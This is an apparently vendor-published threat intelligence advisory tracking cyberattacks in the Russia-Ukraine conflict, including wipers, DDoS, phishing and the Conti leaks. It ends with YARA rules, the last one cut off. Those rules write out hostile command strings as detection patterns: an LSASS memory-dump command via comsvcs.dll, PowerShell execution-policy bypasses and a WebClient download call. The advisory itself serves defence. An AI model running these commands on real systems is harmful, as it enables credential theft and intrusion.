Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Geopolitical Advisory

[10 May 2022, Version 13, NEW]
Docker Images Used by Pro-Ukraine Hackers to DDoS Russian Websites

This week researchers observed a plethora of distributed denial-of-service (DDoS) attacks on Russian and Belarusian websites. The targeted websites are managed by either the respective governments of these two nations, military organizations, or media houses.

It is suspected that pro-Ukrainian threat actors, probably backed by Ukraine’s IT Army – are behind this attack. Researchers note that the two Docker images used in this attack were being deployed between February and March.

On sample analysis it was found that the compromised honeypot Docker image contains a Go-based HTTP benchmarking tool named bombardier with SHA256 hash 6d38fda9cf27fddd45111d80c237b86f87cf9d350c795363ee016bb030bb3453 that uses HTTP-based requests to stress-test a website.

Recommendations:

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs, and strengthening defenses based on tactical intelligence provided.
  • Assess and deploy alternatives for an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next-generation security solutions, and ready to go incident response plan.
  • Consider implementing Network Traffic Analysis (NTA), and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
  • Consider running scans and perform periodic audits to help identify future misconfigurations or missing patches.
  • Install anti-APT and EDR solutions, enabling threat discovery and detection, investigation, and timely remediation of incidents capabilities.

[29 April 2022, Version 12]
CERT-UA Warns of Ongoing DDoS Attacks

Ukraine’s Computer Emergency Response Team (CERT-UA) has published an advisory warning of the ongoing Distributed Denial-of-Service (DDoS) attacks which target Government web portals as well as Pro-Ukraine websites.

As per the advisory, threat actors are compromising WordPress-based websites. This was done by injecting malicious JavaScript code which is placed in the HTML structure of the main files of the website. These codes are base64-encoded to evade detection.

Some of the targeted websites include:

  • kmu.gov.ua (Ukrainian government portal)
  • callrussia.org (project to raise awareness in Russia)
  • gngforum.ge (inaccessible)
  • secjuice.com (infosec advice for Ukrainians)
  • liqpay.ua (inaccessible)
  • gfis.org.ge (inaccessible)
  • playforukraine.org (play-based fundraiser)
  • war.ukraine.ua (news portal)
  • micro.com.ua (inaccessible)
  • fightforua.org (international enlistment portal)
  • edmo.eu (news portal)
  • ntnu.no (Norwegian university site)
  • megmar.pl (Polish logistics firm)

Recommendations:

  • Deploy appropriate hardware that can handle known attack types and use the options that are in the hardware that would protect network resources. Again, while bolstering resources will not prevent a DDoS attack from happening, doing so will lessen the impact of an attack.
  • Opt for DDoS prevention providers who can implement cloud scrubbing services for attack traffic to remove most of the problematic traffic before it ever hits a victim’s network.
  • Keep your website’s content management systems (CMS) up to date.
  • Use the latest available version of any active plugins.
  • Restrict access to the website management pages.

[22 April 2022, Version 11]
Joint Advisory Released by US and Allied Cybersecurity Authorities

A recent advisory was released by the cyber authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom to warn organizations about the Russian state-sponsored and criminal cyber threats to critical infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) authored “Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure” in partnership with the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), National Cyber Security Centre New Zealand (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) and National Crime Agency (NCA), and with contributions from industry members of CISA’s Joint Cyber Defense Collaborative.

As per the advisory, the Russian invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. As per experts, these activities might be a response to the unprecedented economic costs imposed on Russia as well as the material support provided by the United States and U.S. allies and partners.

Final Takeaways:

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed because vulnerabilities are one of the top attack vectors.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts.
  • Secure and monitor remote desktop protocol and other risky services.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

[19 April 2022, Version 10]
Ukraine’s Energy Provider Targeted by Industroyer2 Malware

It has been observed that the energy providers in Ukraine have been targeted by a new variant of Industroyer malware – dubbed Industroyer2. The threat actor Sandworm (reportedly linked to the Russian State Security Services) is suspected to be behind this attack. In collaboration with CERT-UA, the researchers discovered that Sandworm made attempts to implant Industroyer2 malware against Ukrainian high-voltage electrical substations. The threat actor groups, in addition to Industroyer2, used other malware families including CaddyWiper, ORCSHRED, SOLOSHRED, and AWFULSHRED. At this point, researchers are unclear about the initial access vector, and nor are they sure about how the threat actor moved from IT to the ICS network.

Final Takeaway:

  • As per researchers, on analyzing the timestamps of Industroyer2’s compilation and scheduled task entry created from an infection, it has been assessed that the threat actor had prepared the attack at least two weeks in advance.
  • Researchers also highlight that the new variant Industroyer2 malware is believed to be based on the same source code as Industroyer with high confidence. The new malware variant is highly configurable and has detailed hardcoded configuration in its body as opposed to Industroyer which stored configuration in an .INI file. The said configuration essentially drives the action of the malware and therefore, the attackers are required to compile Industroyer2 for each new victim or environment. Researchers assess that this limitation is not going to hinder Sandworm.

Recommendations:

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs, and strengthening defenses based on tactical intelligence provided.
  • Block exploit-like behavior. Monitor endpoints memory to find behavioral patterns that are typically exploited, including unusual process handle requests. These patterns are features of most exploits, whether known or new. This will be able to provide effective protection against zero-day/critical exploits and more, by identifying such patterns.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Take advantage of global CTI feeds providing valuable insights on threat actor activity, detection, and mitigation techniques to security teams.
  • Ensure backups of critical systems are maintained, which can be used to restore data in case a need arises.
  • Employ robust endpoint security options that will allow your IT team to identify what confidential information is being stolen, when, and through what specific channel or device.

[05 April 2022, Version 9]
AcidRain: The Newest Wiper Malware in the Russia-Ukraine Crisis

Post the multifaceted and deliberate cyberattack launched against Viasat’s KA-SAT network, researchers have discovered a new wiper malware named AcidRain. This is an ELF MIPS malware that wipes modems and routers.

Viasat has confirmed the use of this malware in the attack on its modems on the 24th of February. As per researchers, AcidRain can destroy all files inside a compromised machine by overwriting files leaving them unusable after the data wiping processes are completed. AcidRain is the 7th malware wiper used by Russia in the ongoing war with Ukraine. The other notable ones are WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero.

There is a section of researchers in the threat intel community which believes that this wiper malware was specifically designed to launch cyberattacks in Ukraine, though there is no clear evidence available at the moment.

[04 April 2022, Version 8]
As per the recent incident report released by Viasat, on 24th February 2022 “a multifaceted and deliberate cyberattack” was launched against its KA-SAT network which led to a partial interruption of KA-SAT’s consumer-oriented satellite broadband service. The company has confirmed that the cyber attack did impact several thousand customers located in Ukraine and tens of thousands of other fixed broadband customers across Europe.

According to Viasat, the incident was localized to a consumer-focused partition of the KA-SAT network. High volumes of focused, malicious traffic were detected emanating from several SurfBeam2 and SurfBeam 2+ modems and/or associated customer premise equipment (CPE) physically located within Ukraine and serviced by one of the KA-SAT consumer-oriented network partitions. This targeted denial of service attack made it difficult for many modems to remain online.

The cyber attackers leveraged “a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network.”

Final Takeaway:

  • The satellite internet provider has not mentioned any suspected threat actor or country of origin for this cyberattack. Yet, as per our cyber threat intelligence team, the coincidence of this cyberattack on Ukrainians in the backdrop of the ongoing Russia Ukraine crisis cannot be ruled out. These cyber-attacks could be retaliatory measures taken by pro-Russian groups against the US and its allies for imposing sanctions against Russia in the ongoing conflict.
  • Vulnerable VPNs have emerged as one of the most common attack vectors. Apart from exploiting the vulnerabilities for DoS attacks and malware implants, there have been instances wherein ransomware groups have leveraged it for double extortion.

Recommendations:

  • Implement an advanced endpoint protection solution (EDR) that provides detection/prevention of malicious activities that do not rely on signature-based detection methods.
  • Establish a robust security posture that is thoughtfully layered with a series of security mechanisms and controls in the network to protect the confidentiality, integrity, and availability of critical data.
  • In case of running a vulnerable version at any point in time, disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken:
  • Immediately upgrade to the latest available release.
  • Regardless of the upgrade, a user password reset must be followed.
  • Consider all credentials as potentially compromised and initiate an organization-wide password reset.
  • Intimate users to reset their passwords by explaining the reason.
  • Leverage third-party credential leak monitoring services.

[ 31 March 2022, Version 7]
5 weeks since the Russia-Ukraine war, its repercussions from the cybersecurity angle are being experienced in major parts of the world.

Here is a timeline of the major events in the Russia-Ukraine crisis:

30 March 2022

  • Viasat Confirms Cyberattack: The U.S.-based satellite internet provider, Viasat confirmed a ‘multifaceted and deliberate cyberattack’ which was limited to European customers, including several thousand located in Ukraine.
  • Gamaredon Targets NATO: The Russian APT Group Gamaredon, was observed phishing accounts of NATO and Eastern European militaries in addition to existing campaigns against American NGOs, a Ukrainian defense contractor, and a Balkan military.

29 March 2022

    Russian Hackers Scan US Energy Systems: As per the FBI, Russian state-sponsored cyber criminals pose a “current” threat to American national security – with Russian hackers scanning the systems of energy companies and other critical infrastructure.

28 March 2022
Ukrtelecom Hit by Cyberattack: Ukraine’s state-owned telecommunications company – experienced a “powerful” cyberattack, which was eventually repelled as per the Ukrainian government officials and company representatives.

24 March 2022
SAP out of Russia: German business software giant SAP shut its cloud operations in Russia.

22 March 2022
5 US Energy Firms Scanned: FBI releases an advisory on hackers associated with Russian internet addresses who have been scanning the networks of five US energy companies in a possible prelude to hacking attempts.

21 March 2022
Need to strengthen US Healthcare Cybersecurity: Department of Health and Human Services is urged healthcare organizations to review and bolster defenses to guard against possible fallout from the Russian invasion of Ukraine.

18 March 2022
SaintBear Targets Ukraine: Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

15 March 2022
CaddyWiper Targets Ukraine: The malware was observed targeting Ukraine is designed to wipe data across the Windows domains it is deployed on.

14 March 2022
Rise in Phishing Attacks: Ukraine witnessed a rise in the use of phishing emails as the primary attack vector to further execute scams and deliver malicious malware (including, but not limited to Remote Access Trojans/ RAT) since the Russian invasion.

13 March 2022
Rosneft Hit by Cyberattack: The Russian Energy company’s German subsidiary suffered cyberattacks.

11 March 2022
Series of DDoS Attacks on Russian Websites: Russian company websites were hit by increased hacking attempts.
Broadband Cyberattacks Disrupted: Western intelligence agencies investigate unidentified hackers who disrupted the broadband satellite Internet access in Ukraine.

8 March 2022
ISP’s Quit Russia: Internet Service Providers, Cogent Communications and Lumen Technologies stop their internet services in Russia.

7 March 2022
IsaacWiper Launched on Ukraine: Data wiper malware named “IsaacWiper” – suspected to be part of Russian sabotage arsenal, deployed on Ukrainian government infrastructure.

2 March 2022
Patriotic Emotions Gets the Better of Conti Ransomware Group: A new Twitter account named “Contileaks” emerged, which is – suspectedly created by a pro-Ukraine member of the ransomware group – in an effort towards “Glory to Ukraine” has leaked what our threat intelligence team regards as precious classified information.

1 March 2022
Russian Power Grid and Railways Attacked: In an attempt to strike back at Russia over its Ukraine invasion, a Ukraine-based cyber guerrilla warfare group plans to launch digital sabotage attacks against critical Russian infrastructure.

28 February 2022
FoxBlade Trojan Launched on Ukraine: Hours before the Russian invasion, Ukraine witnessed a cyberattack by FoxBlade – a trojan that has DDoS capabilities.

27 February 2022
US Banks Gear Up for Cyberattacks: Post sanctions on Russia, US banks strengthen their cyber defense keeping retaliatory cyberattacks from Russia.

26 February 2022
Internet Shut Down in Ukraine: As Russian troops advanced in Ukraine, the country faces a major internet knockout.
Official Russian Website Offline: As several Russian governments and state media websites suffered DDoS attacks, the official website of the Kremlin went offline.

25 February 2022
Conti Sides with Russia: In the emerging Russia-Ukraine crisis, the Conti ransomware group sides with Russia and vows to “retaliate in case the Western warmongers attempt to target critical infrastructure in Russia.
Ukrainian Personnel Attacked by Phishing Attacks: Belarus-based hackers launch phishing attacks targeting Ukrainian military personnel.

24 February 2022
Russian Government Websites Down: The websites of the Russian government, State Duma, and Russian President were intermittently unavailable in Russia and Kazakhstan.
Ukraine Calls on Hacker Underground: Ukrainian Government called for support from hackers underground to conduct espionage against Russia and protect critical infrastructure.

23 February 2022
Linux Systems Attacked by Sandworm: Russian APT hacking group Sandworm allegedly attacked UK and US agencies.
Ukraine Attacked by Wiper Malware: Ukrainian enterprises have been attacked by a new wiper malware, which was witnessed in Latvia and Lithuania.

18 February 2022
Ukraine Suffers SMS Spam and DoS Attacks: Cyber Officials in the US found evidence of massive DoS and SMS Spam campaigns in Ukraine – originating in Russia.

11 January 2022
Joint Alert Released on Cyberattacks: The National Security Agency, Cybersecurity Infrastructure and Security Agency, and the FBI have released a joint alert warning of ongoing targeted cyberattacks from Russian state-sponsored cyber operations.

[ 18 March 2022, Version 6]
As per our Cyber Threat Intelligence Team Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

We believe that UAC-0056 was behind the WhisperGate activity which impacted the Ukrainian government agencies. As per our research, the threat actor was perhaps building on the GrimPlant and GraphSteel campaign since December 2021.

Post the compromise of the target organization, the GraphSteel variant will execute a set of reconnaissance and credential harvesting commands.

[ 15 March 2022, Version 5]
In line with CYFIRMA’s Cyber Security Predictions for 2022, the world is witnessing ongoing hybrid warfare against nations and their critical infrastructure. The Russia-Ukraine crisis head started with a plethora of cyberattacks with data wiping malware being used as a potent tool against Ukraine.

The newest malware observed in this chain is “CaddyWiper”. This malware is designed to wipe data across the Windows domains it is deployed on. What makes it different from the other malware is the tactic used by the attackers to maintain access inside the compromised networks of organizations they hit while still heavily disturbing operations by wiping other critical devices. For this to happen – the wiper malware used the DsRoleGetPrimaryDomainInformation() function to check if a device is a domain controller. If so, the data on the domain controller will not be deleted.

While the CaddyWiper does not share any similarity with the other wiper malware used before Russia’s physical invasion of Ukraine – it is quite similar to the HermeticWiper deployments. A sample analysis of this malware shows that just like the Hermetic Wiper, CaddyWiper was being deployed via GPO. This means that the attackers had control of the target’s network beforehand.

[ 14 March 2022, Version 4]
Like any global conflict, the Russia-Ukraine crisis too has opened the doors of exploits for opportunistic threat actors. This pattern of exploiting the existing public sentiments for financial gains is not new among cybercriminals – and has been witnessed during several global crises including the Covid-19 pandemic.

Our Cyber Threat Intelligence has observed a meteoric rise in the use of phishing emails as the primary attack vector to further execute scams and deliver malicious malware (including, but not limited to Remote Access Trojans/ RAT). Especially several Business Email Compromise (BEC) campaigns have been witnessed since the Russian invasion. Most of these emails use commodity malware such as Remcos RAT to deliver malevolent payloads which are distributed in large quantities across the target threat landscape. This is also the time that threat actors are exploiting existing vulnerabilities in Microsoft Office for malware implant. For instance, CVE-2017-11882 – a “Microsoft Office Memory Corruption Vulnerability” – has been successfully leveraged by cybercriminals to run arbitrary code.

[ 04 March 2022, Version 3]
As Russia bombs major Ukrainian cities, more intel on the symphony of cyberattacks that took place before the invasion has emerged. Our threat intelligence team has observed the use of a new data wiper malware named “IsaacWiper” – which they believe was part of Russian sabotage arsenal and has been deployed on Ukrainian government infrastructure (that were not attacked by HermeticWiper).

While the first incidence of IsaacWiper was observed on the 24th of February, there is substantial evidence that a new version of the data wiper was dropped on February 25th. Based on our hypothesis, the second version of the malware was suspected to be used as the threat actors failed to wipe off part of the target infrastructure. The log messages were added to keep a grip of how the malware interacted with the attacked asserts.

Apart from IsaacWiper, researchers have also found new samples signed under Hermetica Digital Limited and named them as HermeticWizard. This malware works on finding the machines connected to the local networks and moves on to gathering local IP addresses. The end goal seems to be dropping and executing the HermeticWiper malware.

Furthermore, our threat intelligence team has also identified additional TTPs of Conti Ransomware being leveraged in the ongoing conflict.

[ 02 March 2022, Version 2]
Patriotic Emotions Gets the Better of Conti Ransomware Group

The announcement of the “full support” to the Russian invasion of Ukraine by the notorious Conti Ransomware Group – seems to have ruffled some patriotic emotions among a member of the gang or a security researcher with Ukrainian origin.

The end result? 3 days after the attack on Ukraine, a new Twitter account named “Contileaks” emerged on the 27th of February. The account – suspected created by a pro-Ukraine member of the ransomware group – in an effort towards “Glory to Ukraine” has leaked what our threat intelligence team regards as precious classified information. This data not only gives an inner glimpse of Conti’s workings since January 29, 2021 – but explosive TTPs which can be leveraged by several cybercriminal groups in the upcoming months.

[ 26 February 2022, Version 1]
Objective: Unauthorized Access, Cyber Espionage, Data Exfiltration, Payload Delivery, Defense Evasion, Defacement, Hybrid Warfare.

Type of Attack: Spear-Phishing, Impersonation, Malware Implant/ Data Wiper Malware, Smishing, BGP Hijacking, DDoS (Distributed Denial-of-Service), Vulnerabilities & Exploits (October CMS).

Target Technology: Microsoft Windows, Linux, Web Applications.

Target Geography: Ukraine, Global.

Target Industry: Government, Defence, Utilities, Energy, Transportation Infrastructure, Diversified Financials, Critical Infrastructure.

Suspected Vulnerability Leveraged: CVE-2021-32648 (CVSS Score: 9.1).

Suspected Threat Actors: Gamaredon, Ghostwriter, MuddyWater, Unknown Russian Threat Actors.

Malware: WhisperGate, HermeticWiper.

Business Impact Analysis: Data Loss, Operational Disruption, Reputational Damage, Geopolitical Risk.

Reported Date: February 26, 2022.

SUMMARY: As this article is being written, Russia has officially declared war on Ukraine. Ukraine which has been for years a testing ground for cyberweaponry has now turned into a textbook case of how cyberattacks can be used to launch hybrid warfare.

While cyber offensive and use of state-sponsored threat actors are not new for both Russia and Ukraine (can be traced back to 2005), the recent cocktail of attacks launched by Russian Intelligence before formally declaring this invasion further highlights how geopolitical issues can snowball into a crippling effect on critical infrastructure and state machinery.

Recent Cyber Escalations in Ukraine:
Since October 2021, our cyber threat intelligence team has observed a trail of spear-phishing campaigns targeting organizations and entities connected with Ukrainian affairs – ranging from government agencies, defense bodies, judiciary, moving on to NGOs and humanitarian aid bodies.

These campaigns were tracked down to be cyber-espionage operations launched by Gamaredon, aimed at exfiltrating sensitive data, gaining access to critical infrastructure, maintaining persistence, and following it up with lateral movement.

Linked to Russia’s domestic intelligence service (FSB), Gamaredon resorted to remote template injection to evade detections as well as control how and when will the malicious components in the phishing emails will be delivered. It was observed that the attachments to these emails carried first-stage payloads which when downloaded can execute further payloads. The initial staging capabilities include (but are not limited to) obfuscated VBScripts, obfuscated PowerShell commands, LNK files, and self-extracting archives.

While the clarity on multiple subsequent staging scripts is limited, there is a fair possibility staging VBScripts were deployed for defense evasion and to execute Command-&-Control (C2) changes.

Fast-forward 2022, on January 13, a detrimental malware operation – masquerading as a ransomware attack – was observed to be targeting more than 70 websites of the Ukrainian government. While the defacement message on the websites was political in nature, the aim of the bootloader malware was to corrupt the data of the target infrastructure.

According to researchers, this three-stage Master Boots Record (MBR) wiper malware belongs to a new malware family named WhisperGate. They also observe that the Log4j vulnerability was leveraged to launch this attack. While the modus operandi of WhisperGate seems to resonate with VOODOO BEAR’s NotPetya malware, researchers observe no technical intersection between the two.

Though no clear attribution was made in this attack, Ukrainian officials did suspect Ghostwriter – a Belarusian threat actor group – to be responsible for this attack.

Around the same time, a vulnerability in the OctoberCMS (CVE-2021-32648) was leveraged by threat actors to gain access into the network of Ukrainian government websites. The vulnerability is caused by a flaw in the October/system package. By sending a specially crafted request, an attacker could exploit this vulnerability to request an account password reset and then gain access to the account.

As per our threat intelligence team, the vulnerability exists due to a weak password recovery mechanism. The CWE is CWE-640, CWE-287 and the vulnerability has an impact on confidentiality and integrity.

It was the breach of the Belarus Railway’s computer systems by the hacktivists, which brought in a real-world kinetic attack angle to previous cyber offensive activities. The group not only gained access to the railways’ control systems which could enable them to shut down systems – leading to several accidents.

This series of cyberattacks reached its high point when on the 23rd of February, a new series of malware samples were observed to be making inroads in Ukrainian infrastructure. This new malware, named HermeticWiper – based on the signature used in the digital certificate – was found to be a custom-written application, aiming (just like WhisperGate) to deploy a wiper targeting Windows-based devices and also manipulating the MBR for resultant boot failure. The attack exploits a benign partition management driver to further execute sabotage operations.

The DDoS attack launched using HermeticWiper, not only targeted the government websites and government contractors but also impacted the financial organizations in Ukraine and other member nations of NATO.

Note: As a retaliation to the cyber-kinetic attacks on Ukraine, the hacking group Anonymous Collective claims to have declared war on the Russian government.

Hypothesis:
We believe that these series of activities are a classic case of how cyberattacks can be used to build a smokescreen around political propaganda. By the virtue of being well-incorporated into Western Europe’s internet network as well as with the West, Ukraine provides the perfect backdoor entry into the rest of Europe as well as cyberattacks at a global level.

We expect similar long-term politically motivated cyberattacks as the newest addition in the global warfare weaponry.

While the kinetic attack on Ukraine is being witnessed at the global level, our threat intelligence team is closely monitoring the activities in the underground forums and dark web. With claims by random threat actors around the data leak of sensitive US personnel information – as retaliation to its support to Ukraine – we expect the dark web and underground forums to remain active with such spoils in the forthcoming days.

As per our threat intelligence team the ongoing Russia-Ukraine conflict can spill over and cause the following impact:

  • Threat to the Physical Security of Ukraine: As the military offensive between the two countries continues, there is a huge possibility that the Russian troops would work towards capturing Kyiv – the capital city of Ukraine – to possibly establish a proxy government favouring Russia.
  • Escalated Cyber Attacks: Attacks in cyberspace, the digital world would continue to see an uptick with both the sides and its allies targeting each other, the organizations and their subsidiaries/vendors/partners with ransomware attacks, Wiper malware, DDOS attacks, and more to cause operational disruption, reputational damage, espionage activities.
  • Impact on Supply Chain: The ongoing conflict would impact the supply chain for many nations around the world that have ties with Ukraine and Russia for imports and exports of multiple items. The nations/organizations/individuals would have to now look for alternatives to minimize and meet expectations of the demand & supply.
  • Economic Repercussions: Due to the ongoing conflicts and dependence on the supply chain, price rise on vital items is quite expected, leading governments to rethink their plans and strategies for the coming years.
  • Anticipated Sanctions: Organizations having business/contracts with Russian organizations could be impacted due to the sanctions put in place and would find it difficult for the sale of components, sharing of technology, financial transactions, other business collaborations.
  • To conclude, the way Russia has managed to immobilize Ukraine through a series of cyberattacks is a glaring reminder of Sun Tzu’s words in “The Art of War” – often regarded as the Bible of Military Strategy – that a warring nation can gain victory by just subduing its enemy, without even engaging in a physical fight.

INSIGHTS:

  • Russian threat actors are suspected of using wiper malware to target government entities, financial institutions, investment organizations, critical infrastructure on NATO member nations, and other nations who are asserting against the recent Russian aggression on Ukraine. The threat actors are believed to be targeting these organizations with the backing of their government and intelligence agencies without carrying much on the physical location of the organizations.
  • The Russian cyberattacks are believed to be in retaliation for ongoing economic and diplomatic sanctions imposed by many nations led by the US & EU and pose a heightened risk of further escalation in the cyber world.
  • Their primary intent is to cause reputational damage to countries (and organizations from these countries) who are not in sync with their geo-political agenda, exfiltrate and wipe-out sensitive data, cause operational disruption, and name/shame entities by selling data in the grey market or to competitors for financial gains.
  • It is suspected that multiple assets have been targeted so far, and from a few assets, data has been wiped. We suspect more such vulnerable assets could be targeted in the coming days based on the development of the geopolitical situation in Europe.
  • While in the past, the Gamaredon group has heavily relied on off-the-shelf tools, as early as December 2021 it was observed that it has shifted to custom-developed malware. The group was noted to be using a novel RTF template injection technique in their phishing campaigns to retrieve malicious content from remote URLs. Apart from the recent deployment of eight custom binaries in cyber-espionage operations against Ukrainian entities; this hacking group is believed to be responsible for thousands of attacks in Ukraine since 2013.
  • As per researchers, WhisperGate consists of two samples: One appears as ransomware while the other is a beaconing implant used to deliver an in-memory Microsoft Intermediate Language (MSIL) payload. The in-memory code uses Living Off the Land Binaries (LOLBINs) to evade detection and also performs anti-analysis techniques, as it will fail to detonate when certain monitoring tools exist.

Indicators of Compromise:
Refer to the IOCs file to exercise controls on your security systems.

Targeted Recommendations:

  • Implement unified threat management and external threat landscape management strategy programs – including malware detection, deep learning neural networks, and anti-exploit technology connected with vulnerability and risk mitigation.
  • Use threat intelligence services and continue monitoring situational awareness on the emerging threats on the Ukraine crisis and its impact.
  • It is recommended that organizations and their subsidiaries with operations in Ukraine undergo a thorough review of their business continuity and resilience plans.
  • Organizations with no direct contact/ exposure to Ukraine should consider building a plan to avoid any sort of collateral damage which can arise from attacks in this region.
  • Consider alternative plans to diversify, identify supply chains that include components from Russia, Ukraine.
  • To limit & minimize the likelihood of hackers using lateral movement modules, disable PowerShell wherever possible.
  • It is recommended that organizations, regardless of the geography of their operations, incorporate Digital Risk Protection (DRP) as part of the overall security posture to proactively defend against impersonations and phishing attacks.
  • Use of network segmentation within converged IT/OT environment as a critical security control based on network type, purpose, access privileges to limit the snowball effect in an event of a compromise of a network segment.
  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs and strengthening defenses based on tactical intelligence provided.
  • Configure the provided YARA rules as well as Sigma rules in your network defense mechanisms to alert attempts of cyberattacks, monitor anomalies, and restrict traffic across the network.
  • In addition to applying patches in public-facing infrastructure, organizations should:
    • Consider deploying and configuring a File Integrity Monitoring solution to monitor and/or prevent the creation of files, especially on web servers outside of maintenance windows.
    • Enable enhanced logging and implement sufficient log retention periods to support investigations, including, Microsoft Systems Monitor (Sysmon) on Windows Servers and PowerShell Module, Script Block, and Transcription Logging.
    • Most of all, employ a robust endpoint security option that will allow your IT team to identify what confidential information is being stolen, when, and through what specific channel or device.

YARA Rules
Rule 1:
rule APT_UA_Hermetic_Wiper_Feb22_1 {
meta:
description = “Detects Hermetic Wiper malware”
score = 75
hash1 = “0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da”
hash2 = “3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767”
hash3 = “2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf”
hash4 = “1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591”
strings:
$xc1 = { 00 5C 00 5C 00 2E 00 5C 00 50 00 68 00 79 00 73
00 69 00 63 00 61 00 6C 00 44 00 72 00 69 00 76
00 65 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
00 45 00 50 00 4D 00 4E 00 54 00 44 00 52 00 56
00 5C 00 25 00 75 00 00 00 5C 00 5C 00 2E 00 5C
00 00 00 00 00 25 00 73 00 25 00 2E 00 32 00 73
00 00 00 00 00 24 00 42 00 69 00 74 00 6D 00 61
00 70 00 00 00 24 00 4C 00 6F 00 67 00 46 00 69
00 6C 00 65 }
$sc1 = { 00 44 00 72 00 69 00 76 00 65 00 72 00 73 00 00
00 64 00 72 00 76 00 00 00 53 00 79 00 73 00 74
00 65 00 6D 00 33 00 32 }

$s1 = “\\\\?\\C:\\Windows\\System32\\winevt\\Logs” wide fullword
$s2 = “\\\\.\\EPMNTDRV\\%u” wide fullword
$s3 = “DRV_XP_X64” wide fullword
$s4 = “%ws%.2ws” wide fullword

$op1 = { 8b 7e 08 0f 57 c0 8b 46 0c 83 ef 01 66 0f 13 44 24 20 83 d8 00 89 44 24 18 0f 88 3b 01 00 00 }
$op2 = { 13 fa 8b 55 f4 4e 3b f3 7f e6 8a 45 0f 01 4d f0 0f 57 c0 }
condition:
( uint16(0) == 0x5a53 or uint16(0) == 0x5a4d ) and
filesize < 400KB and ( 1 of ($x*) or 3 of them ) } Rule 2:
rule APT_UA_Hermetic_Wiper_Artefacts_Feb22_1 {
meta:
description = “Detects artefacts found in Hermetic Wiper malware related intrusions”
score = 75
strings:
$sx1 = “/c powershell -c \”rundll32 C:\\windows\\system32\\comsvcs.dll MiniDump” ascii wide
$sx2 = “appdata\\local\\microsoft\\windows\\winupd.log” ascii wide
$sx3 = “AppData\\Local\\Microsoft\\Windows\\Winupd.log” ascii wide
$sx4 = “CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1” ascii wide
$sx5 = “\\policydefinitions\\postgresql.exe” ascii wide

$sx6 = “powershell -v 2 -exec bypass -File text.ps1” ascii wide
$sx7 = “powershell -exec bypass gp.ps1” ascii wide
$sx8 = “powershell -exec bypass -File link.ps1″ ascii wide

/* 16 is the prefix of an epoch timestamp that shouldn’t change until the 14th of November 2023 */
$sx9 = ” 1> \\\\127.0.0.1\\ADMIN$\\__16″ ascii wide

$sa1 = “(New-Object System.Net.WebClient).DownloadFile(” ascii wide
$sa2 = “CSIDL_SYSTEM_DRIVE\\temp\\” ascii wide
$sa3 = “1> \\\\127.0.0.1\\ADMIN$” ascii wide
condition:
1 of ($sx*) or all of ($sa*)
}

Rule 3:
rule APT_UA_Hermetic_Wiper_Scheduled_Task_Feb22_1 {
meta:
description = “Detects scheduled task pattern found in Hermetic Wiper malware related intrusions”
score = 85
strings:
$a0 = “ Back to Listing